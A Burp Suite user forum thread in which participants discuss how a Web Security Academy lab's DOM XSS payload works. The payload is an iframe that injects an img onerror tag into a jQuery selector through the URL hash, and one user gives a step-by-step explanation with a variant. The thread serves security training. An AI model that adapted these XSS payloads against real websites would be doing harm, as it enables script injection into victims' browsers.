Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

DOM XSS in jQuery selector sink using a hashchange event

boonjin | Last updated: Mar 15, 2022 01:13AM UTC

Hi, does anyone understand how the payload works for this? <iframe src="https://YOUR-LAB-ID.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe> Why do we have to send to the exploit server for this, and why do we have to trigger onerror=print()?

Hannah, PortSwigger Agent | Last updated: Mar 15, 2022 10:25AM UTC

Hi You can find the learning for this lab here: https://portswigger.net/web-security/cross-site-scripting/dom-based#dom-xss-in-jquery You need to trigger "onerror=print()" because the goal of the lab is to execute the print() function in the victim's browser. The example in the learning materials calls "alert()" instead.

Eileen | Last updated: Nov 13, 2022 06:15AM UTC

1. If you use burp scanner, it would catch the following: "Data is read from location.hash and passed to jQuery.parseHTML." 2. If you look into DOM Invader's stacktrace, you will notice parseHTML was found inside jQueryMigrate 1.4.1 source code. This essentially means that jQuery's selector actually parse HTML. 3. You can test this by entering the following into developer console and observe the alert pop up box even though the image is invisible. ``` > $('<img src=x onerror=alert()'); ``` 4. What we need to do is to replace the URL fragment portion with our IMG tag payload. 5. Since the page does not block iframe with X-Frame-Options, we can first set the iframe src to any dummy value first and then update the src with our actual payload. The following payload would be easier to understand. ``` <html><body> <iframe src="https://<LABID>.web-security-academy.net/#aaa" onload="this.src='https://<LABID>.web-security-academy.net/#<img src=x onerror=alert() >' " ></iframe </body></html> ```

Eileen | Last updated: Nov 13, 2022 06:16AM UTC

Update typo for step 3. ``` > $('<img src=x onerror=alert() >'); ```

Eileen | Last updated: Nov 13, 2022 06:29AM UTC

This youtube video has quite an excellent walkthrough and explanation: https://www.youtube.com/watch?v=CNIeel0VrN0

mraker | Last updated: Dec 07, 2022 03:11AM UTC

<iframe src="https://0abe005504009c9cc0b315b700d200a7.web-security-academy.net//#" onload="this.src+='<img src=x onerror=print()>'"></iframe>

mraker | Last updated: Dec 07, 2022 03:11AM UTC

<iframe src="https://0abe005504009c9cc0b315b700d200a7.web-security-academy.net//#" onload="this.src+='<img src=x onerror=print()>'"></iframe>

bheam | Last updated: Feb 05, 2023 07:00AM UTC

HII THIEAR ., LOVE TO DILEVEAR THE KNOWLADGE: <iframe src="httPs://YOUR-LAB-ID.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe> TO DILVER THIS PLZ CORRECTION BY ALERT()FUN.. THANKYOU

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.